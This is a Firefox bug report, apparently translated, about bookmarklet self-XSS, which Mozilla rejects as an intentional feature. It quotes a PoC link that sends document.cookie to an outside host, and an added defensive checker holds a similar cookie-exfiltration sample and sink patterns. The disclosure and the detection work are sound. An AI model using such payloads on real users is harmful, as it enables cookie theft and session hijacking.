Firefox browser XSS vulnerability (bookmarklet self-xss)
Categories (Firefox :: Security, defect)
People (Reporter: a1406339013, Unassigned)
Details (Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
[Translated from the reporter's Chinese original with Google Translate; edited by dveditz]
I submitted this vulnerability once before, at https://bugzilla.mozilla.org/show_bug.cgi?id=1628187. The answer you gave me was that physical attacks are not in the threat model, but I have now thought of a new attack method that does not require any physical contact.
Can you watch the demo video:
https://drive.google.com/open?id=1T0iYzJWkzMNP_RUR1NUoIXeXmu4Z0gjh
poc:
http://www.10000wen.com/xin.html
poc source code:
<a href='javascript:location=%22http%3a%2f%2fwww.10000wen.com%2fcookie.php%3fcookie%3d%27%22%2bdocument.cookie%2b%22%27%22%3b'>11111111111111111111111111111111111</a>
Comment 1•6 years ago
Watching the movie it looks like:
- convince victim to right-click bookmark a javascript: link
- convince victim to use the bookmark on a sensitive site
This is called a "bookmarklet" and is an intentional feature. https://en.wikipedia.org/wiki/Bookmarklet
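Added example (not part of the original bug or its comments): a check that a reviewer or an extension could run on a link's href before it is saved as a bookmark, decoding a javascript: body encoded like the PoC above and flagging bodies that both read page state and have a way to send it elsewhere. The function name inspectHref, the pattern lists and the collector.example.test host are assumptions made for this example.

```javascript
// Added example. Names and pattern lists are assumptions, not Firefox code.
// Page state a bookmarklet can read with the privileges of the open site.
const SENSITIVE_READS = ['document.cookie', 'localStorage', 'sessionStorage'];
// Common ways a script moves data off the current page.
const SINKS = [/\blocation\s*=/, /\blocation\.(href|assign|replace)\b/,
               /\bfetch\s*\(/, /\bXMLHttpRequest\b/, /\.src\s*=/];

function inspectHref(href) {
  // URL parsers drop tabs and newlines, so "java\tscript:" is still a script URL.
  const cleaned = href.replace(/[\t\n\r]/g, '').trim();
  const scheme = /^javascript:/i.exec(cleaned);
  if (!scheme) {
    return { isScript: false, decoded: null, reads: [], hasSink: false, hosts: [], risky: false };
  }
  const raw = cleaned.slice(scheme[0].length);
  let decoded;
  try {
    decoded = decodeURIComponent(raw); // the body is percent-decoded before it runs
  } catch (e) {
    decoded = raw; // malformed escape sequence: inspect the raw text instead
  }
  const reads = SENSITIVE_READS.filter((name) => decoded.includes(name));
  const hasSink = SINKS.some((re) => re.test(decoded));
  // Hosts named in absolute URLs inside the script body.
  const found = [...decoded.matchAll(/https?:\/\/([^\/'"\s?]+)/gi)];
  const hosts = [...new Set(found.map((m) => m[1].toLowerCase()))];
  // Heuristic: reading page state and having a way to send it out.
  return { isScript: true, decoded, reads, hasSink, hosts, risky: reads.length > 0 && hasSink };
}

// Constructed sample in the same encoding as the PoC; the host is a placeholder.
const SAMPLE = "javascript:location=%22http%3a%2f%2fcollector.example.test%2fc.php" +
               "%3fcookie%3d%27%22%2bdocument.cookie%2b%22%27%22%3b";
const report = inspectHref(SAMPLE);
console.log(report.decoded);
console.log(report);
```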
Comment 2•5 years ago
bounty- as this is an intentional design feature